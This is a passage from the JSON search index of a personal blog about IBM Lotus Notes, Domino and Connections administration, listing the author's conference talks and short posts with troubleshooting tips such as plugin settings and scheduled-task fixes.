href=\"#admincamp-2014\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h3\u003e\n\n\u003cul\u003e\n\u003cli\u003e\n\u003cspan\u003e\n \u003ca class=\"text-decoration-none\" href=\"https://share.stoeps.de/2014-t3s1-notes9goesconnections.pdf\" target=\"_blank\"\u003eNotes 9 goes Connections \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\n \n \u003ci class=\"las la-file-pdf la-2x align-middle\"\u003e\u003c/i\u003e\n \n \u003cimg class=\"align-middle stoeps-presentation\" src=\"/images/germany.png\"/\u003e\n \n \u003c/a\u003e\n\u003c/span\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cspan\u003e\n \u003ca class=\"text-decoration-none\" href=\"https://share.stoeps.de/2014-t3s4-connectionsdeepdive.pdf\" target=\"_blank\"\u003eIBM Connections Deep Dive \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\n \n \u003ci class=\"las la-file-pdf la-2x align-middle\"\u003e\u003c/i\u003e\n \n \u003cimg class=\"align-middle stoeps-presentation\" src=\"/images/germany.png\"/\u003e\n \n \u003c/a\u003e\n\u003c/span\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3 id=\"dnug\"\u003eDNUG \u003ca href=\"#dnug\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h3\u003e\n\n\u003cul\u003e\n\u003cli\u003e\n\u003cspan\u003e\n \u003ca class=\"text-decoration-none\" href=\"https://share.stoeps.de/2014-11-11-ibmcnxdeepdive.pdf\" target=\"_blank\"\u003eIBM Connections Deepdive \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\n \n \u003ci class=\"las la-file-pdf la-2x align-middle\"\u003e\u003c/i\u003e\n \n \u003cimg class=\"align-middle stoeps-presentation\" src=\"/images/germany.png\"/\u003e\n \n \u003c/a\u003e\n\u003c/span\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3 id=\"social-connections-vii\"\u003eSocial Connections VII \u003ca href=\"#social-connections-vii\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h3\u003e\n\n\u003cul\u003e\n\u003cli\u003e\n\u003cspan\u003e\n \u003ca class=\"text-decoration-none\" href=\"https://share.stoeps.de/2014-11-soccnx7-deepdive.pdf\" target=\"_blank\"\u003eIBM Connections Deepdive \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\n \n \u003ci class=\"las la-file-pdf la-2x align-middle\"\u003e\u003c/i\u003e\n \n \n \u003cimg class=\"align-middle stoeps-presentation\" src=\"/images/united-kingdom.png\"/\u003e\n \u003c/a\u003e\n\u003c/span\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cspan\u003e\n \u003ca class=\"text-decoration-none\" href=\"https://share.stoeps.de/2014-11-soccnx7-scriptpdf\" target=\"_blank\"\u003eUse Connections Scripts to speed up Installation and Configuration \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\n \n \u003ci class=\"las la-file-pdf la-2x align-middle\"\u003e\u003c/i\u003e\n \n \n \u003cimg class=\"align-middle stoeps-presentation\" src=\"/images/united-kingdom.png\"/\u003e\n \u003c/a\u003e\n\u003c/span\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2 id=\"2013\"\u003e2013 \u003ca href=\"#2013\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h2\u003e\n\n\u003ch3 id=\"social-connections-v\"\u003eSocial Connections V \u003ca href=\"#social-connections-v\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h3\u003e\n\n\u003cul\u003e\n\u003cli\u003e\n\u003cspan\u003e\n \u003ca class=\"text-decoration-none\" href=\"https://share.stoeps.de/2013-socconv-scriptingcnx.pdf\" target=\"_blank\"\u003eSaving my time using scripts \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\n \n \u003ci class=\"las la-file-pdf la-2x align-middle\"\u003e\u003c/i\u003e\n \n \n \u003cimg class=\"align-middle stoeps-presentation\" src=\"/images/united-kingdom.png\"/\u003e\n \u003c/a\u003e\n\u003c/span\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3 id=\"icon-uk\"\u003eICON UK \u003ca href=\"#icon-uk\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h3\u003e\n\n\u003cul\u003e\n\u003cli\u003e\n\u003cspan\u003e\n \u003ca class=\"text-decoration-none\" href=\"http://ressources.stoeps.de/iconuk2013/index-ac.html\" target=\"_blank\"\u003eSaving My Time Using Scripts (Extended) \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\n \u003ci class=\"lab la-html5 la-2x align-middle\"\u003e\u003c/i\u003e\n \n \n \n \u003cimg class=\"align-middle stoeps-presentation\" src=\"/images/united-kingdom.png\"/\u003e\n \u003c/a\u003e\n\u003c/span\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3 id=\"admincamp\"\u003eAdminCamp \u003ca href=\"#admincamp\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h3\u003e\n\n\u003cul\u003e\n\u003cli\u003e\n\u003cspan\u003e\n \u003ca class=\"text-decoration-none\" href=\"http://ressources.stoeps.de/iconuk2013/index-ac.html\" target=\"_blank\"\u003eSaving my time using scripts \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\n \u003ci class=\"lab la-html5 la-2x align-middle\"\u003e\u003c/i\u003e\n \n \n \u003cimg class=\"align-middle stoeps-presentation\" src=\"/images/germany.png\"/\u003e\n \n \u003c/a\u003e\n\u003c/span\u003e\n Extended\u003c/li\u003e\n\u003cli\u003e\n\u003cspan\u003e\n \u003ca class=\"text-decoration-none\" href=\"https://share.stoeps.de/2013-t3s2-connections-security.pdf\" target=\"_blank\"\u003eIBM Connections - Sicherheit \u0026amp; Administration \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\n \n \u003ci class=\"las la-file-pdf la-2x align-middle\"\u003e\u003c/i\u003e\n \n \u003cimg class=\"align-middle stoeps-presentation\" src=\"/images/germany.png\"/\u003e\n \n \u003c/a\u003e\n\u003c/span\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3 id=\"dnug-8211-social-collaboration-39-8220vernetzte-informationswelt8221\"\u003eDNUG – Social Collaboration 39: “Vernetzte Informationswelt” \u003ca href=\"#dnug-8211-social-collaboration-39-8220vernetzte-informationswelt8221\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h3\u003e\n\n\u003cul\u003e\n\u003cli\u003e\n\u003cspan\u003e\n \u003ca class=\"text-decoration-none\" href=\"https://share.stoeps.de/2013-zeitsparenmitscriptingspeedup-ibmconnections-administration.pdf\" target=\"_blank\"\u003eSparen Sie Zeit bei der Administration von IBM Connections \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\n \n \u003ci class=\"las la-file-pdf la-2x align-middle\"\u003e\u003c/i\u003e\n \n \u003cimg class=\"align-middle stoeps-presentation\" src=\"/images/germany.png\"/\u003e\n \n \u003c/a\u003e\n\u003c/span\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3 id=\"50-dannotes-http50dannotesdk\"\u003e50. Dannotes \u003ca href=\"http://50.dannotes.dk\" target=\"_blank\"\u003ehttp://50.dannotes.dk \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n \u003ca href=\"#50-dannotes-http50dannotesdk\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h3\u003e\n\n\u003cul\u003e\n\u003cli\u003e\n\u003cspan\u003e\n \u003ca class=\"text-decoration-none\" href=\"https://share.stoeps.de/2013-11-dannotes.pdf\" target=\"_blank\"\u003eSaving my time using scripts \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\n \n \u003ci class=\"las la-file-pdf la-2x align-middle\"\u003e\u003c/i\u003e\n \n \n \u003cimg class=\"align-middle stoeps-presentation\" src=\"/images/united-kingdom.png\"/\u003e\n \u003c/a\u003e\n\u003c/span\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2 id=\"2011\"\u003e2011 \u003ca href=\"#2011\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h2\u003e\n\n\u003ch3 id=\"admincamp-1\"\u003eAdminCamp \u003ca href=\"#admincamp-1\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h3\u003e\n\n\u003cul\u003e\n\u003cli\u003e\n\u003cspan\u003e\n \u003ca class=\"text-decoration-none\" href=\"https://share.stoeps.de/2011-t1s4-ibmconnections.pdf\" target=\"_blank\"\u003eIBM Connections Installation unter Linux \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\n \n \u003ci class=\"las la-file-pdf la-2x align-middle\"\u003e\u003c/i\u003e\n \n \u003cimg class=\"align-middle stoeps-presentation\" src=\"/images/germany.png\"/\u003e\n \n \u003c/a\u003e\n\u003c/span\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2 id=\"2009\"\u003e2009 \u003ca href=\"#2009\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h2\u003e\n\n\u003ch3 id=\"admincamp-2\"\u003eAdminCamp \u003ca href=\"#admincamp-2\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h3\u003e\n\n\u003cul\u003e\n\u003cli\u003e\n\u003cspan\u003e\n \u003ca class=\"text-decoration-none\" href=\"https://share.stoeps.de/2011-t3s6-nagios.pdf\" target=\"_blank\"\u003eNetzwerküberwachung mit dem Open Source Tool Nagios \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\n \n \u003ci class=\"las la-file-pdf la-2x align-middle\"\u003e\u003c/i\u003e\n \n \u003cimg class=\"align-middle stoeps-presentation\" src=\"/images/germany.png\"/\u003e\n \n \u003c/a\u003e\n\u003c/span\u003e\n\u003c/li\u003e\n\u003c/ul\u003e","ref":"https://stoeps.de/speaking/2015ff/","title":"Talks 2015 and before"},{"body":"Thanks to Marcel de Hoog, i got a solution for the missing pictures in Status Updater Plugin in Lotus Notes.\nAdd com.ibm.lconn.statusupdates/download.image.enabled=true to your plugin_customization.ini. This works on Windows and Mac OS! Haven’t tested it on Linux.\nvia: http://marceldehoog.blogspot.com/2011/12/status-updates-and-pictures.html ","excerpt":"\u003cp\u003eThanks to Marcel de Hoog, i got a solution for the missing pictures in\nStatus Updater Plugin in Lotus Notes.\u003c/p\u003e\n\u003cp\u003eAdd \u003ccode\u003ecom.ibm.lconn.statusupdates/download.image.enabled=true\u003c/code\u003e to your\n\u003ccode\u003eplugin_customization.ini\u003c/code\u003e. This works on Windows and Mac OS! Haven’t\ntested it on Linux.\u003c/p\u003e\n\u003cp\u003evia:\n\u003ca href=\"http://marceldehoog.blogspot.com/2011/12/status-updates-and-pictures.html%c2%a0\" target=\"_blank\"\u003ehttp://marceldehoog.blogspot.com/2011/12/status-updates-and-pictures.html  \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e","ref":"https://stoeps.de/posts/2011/2011-12-16-notes-plugin-status-updater-shows-no-pictures/","title":"Notes Plugin “Status Updater” shows no pictures"},{"body":"Michael Porter wrote a very interesting article with three examples, why Identity Management is really important.\nSome of the biggest usability pain points I’ve seen had less to do with the UI and more to do with the process of setting the users up correctly so they can see all the content to which they are entitled.\nRead more \u0026gt; Thanks.\n","excerpt":"\u003cp\u003eMichael Porter wrote a very interesting article with three examples, why\nIdentity Management is really important.\u003c/p\u003e\n\u003cblockquote\u003e\n\u003cp\u003eSome of the biggest usability pain points I’ve seen had less to do with\nthe UI and more to do with the process of setting the users up correctly\nso they can see all the content to which they are entitled.\u003c/p\u003e\n\u003cp\u003e\u003ca href=\"http://blogs.perficient.com/portals/2011/11/03/why-identity-management-is-important-to-portal-and-collaboration/?utm_source=feedburner\" target=\"_blank\"\u003eRead\nmore \u0026gt; \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003eThanks.\u003c/p\u003e","ref":"https://stoeps.de/posts/2011/2011-11-07-portal-solutions-blog-why-indentity-management-is-important-to-portal-and-collaboration-2/","title":"Portal Solutions Blog: Why Indentity Management is Important to Portal and Collaboration"},{"body":"Today i had a look in the IBM Lotus and WebSphere Portal Business Solutions Catalog and found the new Plugin IBM Connections alerts posted from Luis Benitez .\nAfter installation i have two more icons in my Sametime Contacts:\nIt looks good and a video on the Solution Catalog Page show the functionality. Plugin works on Windows and Mac OS X.\nAlerts look like this:\n","excerpt":"\u003cp\u003eToday i had a look in the\n\u003ca href=\"https://greenhouse.lotus.com/plugins/plugincatalog.nsf\" target=\"_blank\"\u003eIBM Lotus and\nWebSphere Portal Business Solutions Catalog \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n and found the new Plugin\n\u003ca href=\"https://greenhouse.lotus.com/plugins/plugincatalog.nsf/home_full.xsp?fProduct=Lotus%20Notes%20and%20Domino#\" target=\"_blank\"\u003eIBM\nConnections alerts \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n posted from \u003ca href=\"http://lbenitez.com\" target=\"_blank\"\u003eLuis Benitez \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n.\u003c/p\u003e\n\u003cp\u003eAfter installation i have two more icons in my Sametime Contacts:\u003c/p\u003e\n\u003cp\u003eIt looks good and a video on the Solution Catalog Page show the\nfunctionality. Plugin works on Windows and Mac OS X.\u003c/p\u003e\n\u003cp\u003eAlerts look like this:\u003c/p\u003e","ref":"https://stoeps.de/posts/2011/2011-10-27-new-notes-plugin-ibm-connections-alerts/","title":"New Notes Plugin: IBM Connections alerts"},{"body":"categories:\nConference tags: AdminCamp I will speak on AdminCamp 2011. The agenda says Track 1 Session 4 (Thuesday morning).\nI will talk about Lotus Connections 3, my main points will be installation on linux platforms, tipps and hints.\nRegistration is open, so if you have time on 19th to 21th of september, come and visit the AdminCamp. You can register here: http://www.admincamp.de/AdminCampAnmeldung and when you tell them my name on the registration, you save 50€.\nSee you in Gelsenkirchen?\n","excerpt":"\u003cp\u003ecategories:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eConference\ntags:\u003c/li\u003e\n\u003cli\u003eAdminCamp\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eI will speak on \u003ca href=\"http://www.admincamp.de\" target=\"_blank\"\u003eAdminCamp \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n 2011. The agenda says\n\u003ca href=\"http://www.admincamp.de/AdminCamp/Track1Session4\" target=\"_blank\"\u003eTrack 1 Session 4 \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\n(Thuesday morning).\u003c/p\u003e\n\u003cp\u003eI will talk about Lotus Connections 3, my main points will be\ninstallation on linux platforms, tipps and hints.\u003c/p\u003e\n\u003cp\u003eRegistration is open, so if you have time on 19th to 21th of september,\ncome and visit the AdminCamp. You can register here:\n\u003ca href=\"http://www.admincamp.de/AdminCampAnmeldung\" target=\"_blank\"\u003ehttp://www.admincamp.de/AdminCampAnmeldung \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n and when you tell them my\nname on the registration, you save 50€.\u003c/p\u003e\n\u003cp\u003eSee you in Gelsenkirchen?\u003c/p\u003e","ref":"https://stoeps.de/posts/2011/2011-09-07-admincamp2011/","title":"AdminCamp 2011"},{"body":"Wow great tipp! Read it a few years ago, but forgot it. Thanks Gab!\nhttp://www.turtleweb.com/turtleblog.nsf/dx/24082011172619GDAMAP.htm ","excerpt":"\u003cp\u003eWow great tipp! Read it a few years ago, but forgot it. Thanks Gab!\u003c/p\u003e\n\u003cp\u003e\u003ca href=\"http://www.turtleweb.com/turtleblog.nsf/dx/24082011172619GDAMAP.htm\" target=\"_blank\"\u003ehttp://www.turtleweb.com/turtleblog.nsf/dx/24082011172619GDAMAP.htm \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e","ref":"https://stoeps.de/posts/2011/2011-08-24-domino-console-on-the-mac/","title":"Domino Console on the Mac"},{"body":"Wow big news on Notes Design Blog. In my opinion not good for Notes and IBM, but my best wishes and good luck with the new job for Mary Beth.\nhttp://www.notesdesignblog.com/NotesDesignBlog/NDBlog.nsf/dx/so-long-and-thanks-for-all-the-yellow-stuff…..htm ","excerpt":"\u003cp\u003eWow  big news on Notes Design Blog. In my opinion not good for Notes and\nIBM, but my best wishes and good luck with the new job for Mary Beth.\u003c/p\u003e\n\u003cp\u003e\u003ca href=\"http://www.notesdesignblog.com/NotesDesignBlog/NDBlog.nsf/dx/so-long-and-thanks-for-all-the-yellow-stuff%e2%80%a6%e2%80%8b..htm\" target=\"_blank\"\u003ehttp://www.notesdesignblog.com/NotesDesignBlog/NDBlog.nsf/dx/so-long-and-thanks-for-all-the-yellow-stuff…..htm \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e","ref":"https://stoeps.de/posts/2011/2011-08-23-mary-beth-raven-leaves-ibm/","title":"Mary Beth Raven leaves IBM"},{"body":"Martin Cygan postet an interested link today. It is a comparison of features of the different ActiveSync clients with different protocol versions.\nhttp://en.wikipedia.org/wiki/Comparison_of_Exchange_ActiveSync_Clients via Vergleich aller Microsoft Exchange ActiveSync Clients | Martin Cygan ","excerpt":"\u003cp\u003e\u003ca href=\"http://www.martin-cygan.de/microsoft-exchange/vergleich-aller-microsoft-exchange-activesync-clients/\" target=\"_blank\"\u003eMartin\nCygan \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n postet an interested link today. It is a comparison of features\nof the different ActiveSync clients with different protocol versions.\u003c/p\u003e\n\u003cp\u003e\u003ca href=\"http://en.wikipedia.org/wiki/Comparison_of_Exchange_ActiveSync_Clients\" target=\"_blank\"\u003ehttp://en.wikipedia.org/wiki/Comparison_of_Exchange_ActiveSync_Clients \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e\n\u003cp\u003evia\n\u003ca href=\"http://www.martin-cygan.de/microsoft-exchange/vergleich-aller-microsoft-exchange-activesync-clients/\" target=\"_blank\"\u003eVergleich\naller Microsoft Exchange ActiveSync Clients | Martin Cygan \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e","ref":"https://stoeps.de/posts/2011/2011-07-20-comparison-of-microsoft-exchange-activesync-clients/","title":"Comparison of Microsoft Exchange ActiveSync Clients"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/hcl-notes-traveler/","title":"HCL Notes Traveler"},{"body":"See included fixes and downloads:\nNotes/Domino 8.5.2 Fix Pack 3 (now available for download from Fix Central) .\nUpdate: Found a forum post of a iNotes Problem after installing the fixpack: iNotes Formula error after upgrade 8.5.2 FP3 ","excerpt":"\u003cp\u003eSee included fixes and downloads:\u003c/p\u003e\n\u003cp\u003e\u003ca href=\"http://www-10.lotus.com/ldd/nflsblog.nsf/dx/852-Fix-Pack-3\" target=\"_blank\"\u003eNotes/Domino\n8.5.2 Fix Pack 3 (now available for download from Fix Central) \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n .\u003c/p\u003e\n\u003ch1 id=\"update\"\u003eUpdate: \u003ca href=\"#update\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h1\u003e\n\n\u003cp\u003eFound a forum post of a iNotes Problem after installing the\nfixpack: \u003ca href=\"http://www-10.lotus.com/ldd/nd85forum.nsf/DateAllFlatWeb/132EBC8155FF7741852578D20025A9BB?OpenDocument\u0026amp;ca=drs-fo\" target=\"_blank\"\u003eiNotes\nFormula error after upgrade 8.5.2 FP3 \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e","ref":"https://stoeps.de/posts/2011/2011-07-19-ibm-developerworks-fixpack-3-for-notes-domino-8-5-2-is-available/","title":"IBM developerWorks : Fixpack 3 for Notes / Domino 8.5.2 is available"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/google-chrome/","title":"Google Chrome"},{"body":"Using LotusLive with Google Chrome\nvia Using LotusLive with Google Chrome dominoGuru.com .\nChris Toohey wrote a very interesting article on changing User Agent with Google Chrome. Needed this last week on an IBM Webcast, where LotusLive told me after login → you use an unsupported browser. :(\n","excerpt":"\u003cp\u003eUsing LotusLive with Google Chrome\u003c/p\u003e\n\u003cp\u003evia \u003ca href=\"http://www.dominoguru.com/pages/06242011022649.html\" target=\"_blank\"\u003eUsing LotusLive\nwith Google Chrome dominoGuru.com \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n.\u003c/p\u003e\n\u003cp\u003eChris Toohey wrote a very interesting article on changing User Agent\nwith Google Chrome. Needed this last week on an IBM Webcast, where\nLotusLive told me after login → you use an unsupported browser. :(\u003c/p\u003e","ref":"https://stoeps.de/posts/2011/2011-06-25-using-lotuslive-with-google-chrome-dominoguru-com/","title":"Using LotusLive with Google Chrome dominoGuru.com"},{"body":"Ted Hardenburgh gave a session on Paclug on Two Minutes Drills . I found some good hints in his slides and can recommend it for all Lotus Domino Administrators.\nYou can download some sample code like\nNew User Mail Agent\nOrphan Mail File Search template\nQuickr 8.2 Entry Generate XML All\nQuickr 8.2. Entry Generate XML Selected\non his blog in the download section .\n[via Lotus Nut ]\n","excerpt":"\u003cp\u003eTed Hardenburgh gave a session on \u003ca href=\"http://www.paclug.org/\" target=\"_blank\"\u003ePaclug \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n on\n\u003ca href=\"http://dominothoughts.com/DomThoughts/domthoughts.nsf/dx/PACLUG_TwoMinuteDrills.pdf/$file/PACLUG_TwoMinuteDrills.pdf\" target=\"_blank\"\u003eTwo Minutes Drills \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n. I found some good hints in his slides and can\nrecommend it for all Lotus Domino Administrators.\u003c/p\u003e\n\u003cp\u003eYou can download some sample code like\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eNew User Mail Agent\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eOrphan Mail File Search template\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eQuickr 8.2 Entry Generate XML All\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eQuickr 8.2. Entry Generate XML Selected\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eon his \u003ca href=\"http://dominothoughts.com/\" target=\"_blank\"\u003eblog \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n in the\n\u003ca href=\"http://dominothoughts.com/DomThoughts/DomThoughts.nsf/dx/paclug-downloads.htm\" target=\"_blank\"\u003edownload\nsection \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n.\u003c/p\u003e\n\u003cp\u003e[\u003ca href=\"http://www.bleedyellow.com/blogs/lotusnut/entry/twominutedrills?lang=en_us\" target=\"_blank\"\u003evia\nLotus Nut \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n]\u003c/p\u003e","ref":"https://stoeps.de/posts/2011/2011-06-24-paclug-two-minutes-drills-slides/","title":"PacLug – Two Minutes Drills Slides"},{"body":"Mitch found out that FP2 for Notes 8.5.2 breaks Connections Files and Status Updater Plugins.\nhttp://www.curiousmitch.com/2011/05/notes-8-5-2-fp2-and-lotus-connections-plugins-might-not-play-nicely-together/ ","excerpt":"\u003cp\u003eMitch found out that FP2 for Notes 8.5.2 breaks Connections Files and\nStatus Updater Plugins.\u003c/p\u003e\n\u003cp\u003e\u003ca href=\"http://www.curiousmitch.com/2011/05/notes-8-5-2-fp2-and-lotus-connections-plugins-might-not-play-nicely-together/\" target=\"_blank\"\u003ehttp://www.curiousmitch.com/2011/05/notes-8-5-2-fp2-and-lotus-connections-plugins-might-not-play-nicely-together/ \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e","ref":"https://stoeps.de/posts/2011/2011-05-12-notes-8-5-2-fp2-and-lotus-connections-plugins-might-not-play-nicely-together--curiousmitch/","title":"Notes 8.5.2 FP2 and Lotus Connections Plugins Might Not Play Nicely Together « CuriousMitch"},{"body":"I found some tips here i didn’t know. Perhaps some other admins can get some hints too.\nhttp://ntf.gbs.com/nathan/escape.nsf/d6plinks/NTFN-8GP6RP ","excerpt":"\u003cp\u003eI found some tips here i didn’t know. Perhaps some other admins can get\nsome hints too.\u003c/p\u003e\n\u003cp\u003e\u003ca href=\"http://ntf.gbs.com/nathan/escape.nsf/d6plinks/NTFN-8GP6RP\" target=\"_blank\"\u003ehttp://ntf.gbs.com/nathan/escape.nsf/d6plinks/NTFN-8GP6RP \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e","ref":"https://stoeps.de/posts/2011/2011-05-10-escape-velocity-making-domino-designer-work-like-you-want/","title":"ESCAPE VELOCITY Making Domino Designer work like you want"},{"body":"Today i made a new assembly line in Tivoli Directory Integrator.\nI iterate Shortname and Filename (with path) of a jpeg-photo in a csv-file. A java class converts this pic to an jpeg binary (class returns this binary array) and then tdi write this value to domino ldap in jpegphoto attribute.\nWorks great, only the csv-file is a little bit of work, but it is a great way to add lots of pictures to sametime profiles.\nNext step is to include an connector to Lotus Connections profiles.\n","excerpt":"\u003cp\u003eToday i made a new assembly line in Tivoli Directory Integrator.\u003c/p\u003e\n\u003cp\u003eI iterate Shortname and Filename (with path) of a jpeg-photo in a\ncsv-file. A java class converts this pic to an jpeg binary (class\nreturns this binary array) and then tdi write this value to domino ldap\nin jpegphoto attribute.\u003c/p\u003e\n\u003cp\u003eWorks great, only the csv-file is a little bit of work, but it is a\ngreat way to add lots of pictures to sametime profiles.\u003c/p\u003e\n\u003cp\u003eNext step is to include an connector to Lotus Connections profiles.\u003c/p\u003e","ref":"https://stoeps.de/posts/2011/2011-04-29-populate-profile-pictures-with-tdi-to-ldap/","title":"Populate profile pictures with TDI to LDAP"},{"body":"To automate the sync_all_dns.bat on my IBM Lotus Connections Servers, i made a scheduled task for the Tivoli Directory Integrator (TDI) script. This works fine on Windows 2003.\nToday i discovered that my scheduled task on Windows 2008 wasn’t running since i switched the operating system to Microsoft Windows 2008.\nAfter a search i found that i need to set a optional parameter, then it works:\nTo start bat- or cmd-files, you have to insert the path to this script in “Start in (Optional)”. When i start the script without “Start in” the scheduler gives a “SUCCESS” Status, but nothing happens!\nYou can test with schtasks /run /tn \u0026quot;taskname\u0026quot; and have a look on [tdisolutionpath]/logs/ibmdi.log.\n","excerpt":"\u003cp\u003eTo automate the sync_all_dns.bat on my IBM Lotus Connections Servers, i\nmade a scheduled task for the Tivoli Directory Integrator (TDI) script.\nThis works fine on Windows 2003.\u003c/p\u003e\n\u003cp\u003eToday i discovered that my scheduled task on Windows 2008 wasn’t running\nsince i switched the operating system to Microsoft Windows 2008.\u003c/p\u003e\n\u003cp\u003eAfter a search i found that i need to set a optional parameter, then it\nworks:\u003c/p\u003e\n\u003cp\u003e\u003cp class=\"md__image\"\u003e\n \u003cimg src=\"/images/2011/04/2011-04-18_10-14-37.png\" alt=\"2011 04 18 10 14 37\" /\u003e\n\u003c/p\u003e\n\n\u003c/p\u003e\n\u003cp\u003eTo start bat- or cmd-files, you have to insert the path to this script\nin “Start in (Optional)”. When i start the script without “Start in” the\nscheduler gives a “SUCCESS” Status, but nothing happens!\u003c/p\u003e","ref":"https://stoeps.de/posts/2011/2011-04-18-running-sync_all_dns-as-scheduled-task-on-windows-2008/","title":"Running Sync\\_All\\_DNS as scheduled task on Windows 2008"},{"body":"Today i had problems to recreate my Activities Sidebar connection after a Notes Client reinstall.\nEach time when i want to connect, i got the following error message:\nCannot connect to the Activities Server.\nEither the URL is incorrect, the server is down, or a firewall may be preventing you from reaching the server. Check the URL, your firewall settings and the server status and try again.”\nWhen i use the credentials in my browser or the integrated Notes browser, i could login, so server is responding and credentials were ok.\nThen i had a look in my Domino person record and found out, that the shortname i used is not the first one which is configured. So i used the first shortname for activities sidebar and …\nIT WORKS!!!\nResumé: The first shortname in your person record is very important for Lotus IBM Connections. I had several issues when sorting changes in the shortname field, so leave the sorting (because TDI use this for mapping to profiles database) and use the first shortname for the activities sidebar in Lotus 